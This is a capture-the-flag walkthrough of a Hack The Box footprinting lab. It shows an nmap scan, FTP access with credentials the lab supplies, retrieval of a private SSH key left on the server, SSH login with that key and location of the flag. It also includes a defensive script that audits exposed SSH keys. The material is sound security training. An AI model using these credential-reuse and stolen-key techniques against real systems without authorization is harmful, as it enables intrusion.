The Hack The Box (HTB) Footprinting module teaches you how to analyze and footprint a target. Here’s how to derive the solution and capture the flag.
In the first of three Hack The Box footprinting labs, we are given the following instructions.
We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture. The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials “ceil:qwer1234”, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.
The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
To begin, do a basic nmap scan to see what we are working with.
nmap 10.129.156.139 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-29 10:02 CDT
Nmap scan report for 10.129.156.139
Host is up (0.068s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.156.139]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.156.139]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.89 seconds
We see standard FTP and SSH services on their normal ports, as well as the DNS service on port 53. But the service on port 2121 looks interesting.
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.156.139]
It is named Ceil’s FTP and appears to be a ProFTPD server. Given the server’s name, we can presume it could be logged into using Ceil’s stolen credentials (given in the lab instructions). Attempt to FTP to the server.
ftp 10.129.156.139 2121
Connected to 10.129.156.139.
220 ProFTPD Server (Ceil's FTP) [10.129.156.139]
Name (10.129.156.139:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
We were able to log in with Ceil’s credentials. Look around the directories: ls -al reveals a .ssh directory, and in that directory we find an id_rsa file, which appears to be a private key mistakenly placed on the server along with the public key (id_rsa.pub).
ftp> ls
229 Entering Extended Passive Mode (|||44178|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> ls -al
229 Entering Extended Passive Mode (|||55963|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -al
229 Entering Extended Passive Mode (|||23401|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
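Seen from the defender's side, this listing shows two things worth auditing on any host: a private key left in an account's .ssh directory next to an authorized_keys file of the same size as its public half (738 bytes), and an authorized_keys file that is group-writable (-rw-rw-r--). The script below is an added example, not part of the original walkthrough; the function names and the sample files it builds are constructed for illustration, and the key material is fake.

```python
import os
import stat
import tempfile
from pathlib import Path

def key_blobs(path):
    """Base64 key blobs listed in a .pub or authorized_keys file."""
    blobs = set()
    for line in path.read_text(errors="replace").splitlines():
        fields = line.split()
        for i, field in enumerate(fields[:-1]):
            if field.startswith(("ssh-", "ecdsa-", "sk-")):  # key type
                blobs.add(fields[i + 1])                      # blob follows it
                break
    return blobs

def audit_ssh_dirs(home_root):
    """Return (user, finding) pairs for every <home_root>/<user>/.ssh."""
    findings = []
    for ssh_dir in sorted(p for p in Path(home_root).glob("*/.ssh") if p.is_dir()):
        user = ssh_dir.parent.name
        auth = ssh_dir / "authorized_keys"
        trusted = key_blobs(auth) if auth.is_file() else set()
        if auth.is_file() and auth.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((user, "authorized_keys writable by group/other"))
        for f in sorted(ssh_dir.iterdir()):
            if (not f.is_file() or f.suffix == ".pub"
                    or b"PRIVATE KEY-----" not in f.read_bytes()[:64]):
                continue
            pub = f.with_name(f.name + ".pub")
            same_host = pub.is_file() and bool(key_blobs(pub) & trusted)
            findings.append((user, f"{f.name}: private key on host" + (
                ", trusted by this account's authorized_keys" if same_host else "")))
    return findings

def build_sample(root):
    """Constructed layout mirroring the listing above; key material is fake."""
    ssh = Path(root, "ceil", ".ssh")
    ssh.mkdir(parents=True)
    pub_line = "ssh-rsa AAAAB3CONSTRUCTEDBLOB ceil@constructed\n"
    (ssh / "id_rsa").write_text("-----BEGIN OPENSSH PRIVATE KEY-----\nfake\n")
    (ssh / "id_rsa.pub").write_text(pub_line)
    (ssh / "authorized_keys").write_text(pub_line)
    os.chmod(ssh / "authorized_keys", 0o664)  # -rw-rw-r-- as in the listing
    return root

if __name__ == "__main__":
    for user, finding in audit_ssh_dirs(build_sample(tempfile.mkdtemp())):
        print(user, finding)
```

On a real host, point audit_ssh_dirs at /home and run it with enough privilege to read every user's .ssh directory.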
Copy the id_rsa file to the local machine so we can attempt to use it to log in to the SSH service we identified in the nmap scan.
ftp> get ids_rsa
local: ids_rsa remote: ids_rsa
229 Entering Extended Passive Mode (|||24783|)
550 ids_rsa: No such file or directory
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||43119|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |***********************************| 3381 484.05 KiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (45.45 KiB/s)
Next, attempt to log in to the server as “ceil”, passing the private key via the -i option.
ssh -i id_rsa ceil@10.129.156.139
The authenticity of host '10.129.156.139 (10.129.156.139)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.156.139' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
ceil@10.129.156.139: Permission denied (publickey).
We are warned that the permissions on our private key are too lax. chmod 600 the key and try again.
chmod 600 id_rsa
ssh -i id_rsa ceil@10.129.156.139
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 29 Jun 2025 03:13:56 PM UTC
System load: 0.0 Processes: 160
Usage of /: 86.7% of 3.87GB Users logged in: 0
Memory usage: 12% IPv4 address for ens192: 10.129.156.139
Swap usage: 0%
=> / is using 86.7% of 3.87GB
118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$
We are now able to log in to the server using the private key we found earlier. We can now explore the directories.
ls -al
total 36
drwxr-xr-x 4 ceil ceil 4096 Jun 29 15:17 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 2008 Jun 29 15:17 .viminfo
There is no flag here, nor is one found in any of the subdirectories. Edit the .bash_history to see what the last person did.
ls -al
cd .ssh/
cat id_rsa
ls a-l
ls -al
cat id_rsa.pub >> authorized_keys
cd ..
cd /home
cd ceil/
ls -l
ls -al
mkdir flag
cd flag/
touch flag.txt
vim flag.txt
cat flag.txt
ls -al
mv flag/flag.txt .
We see that a flag was created and *moved*. Move up in the directory structure and look there.
ceil@NIXEASY:~$ cd ..
ceil@NIXEASY:/home$ ls -al
total 20
drwxr-xr-x 5 root root 4096 Nov 10 2021 .
drwxr-xr-x 20 root root 4096 Mar 15 2024 ..
drwxr-xr-x 4 ceil ceil 4096 Jun 29 15:18 ceil
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Nov 10 2021 cry0l1t3
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 flag
Of course, the flag directory looks interesting. And there is the flag.txt!
ceil@NIXEASY:/home$ cd flag
ceil@NIXEASY:/home/flag$ ls -al
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 42 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Feb 25 2020 .bashrc
drwx------ 2 ceil ceil 4096 Dec 15 2020 .cache
-rw-rw-r-- 1 ceil ceil 61 Nov 10 2021 flag.txt
drwxrwxr-x 3 ceil ceil 4096 Dec 15 2020 .local
-rw-r--r-- 1 ceil ceil 807 Feb 25 2020 .profile
-rw-r--r-- 1 ceil ceil 0 Dec 15 2020 .sudo_as_admin_successful
Edit the flag.txt file and copy/paste the flag into the answer.
ceil@NIXEASY:/home/flag$ vi flag.txt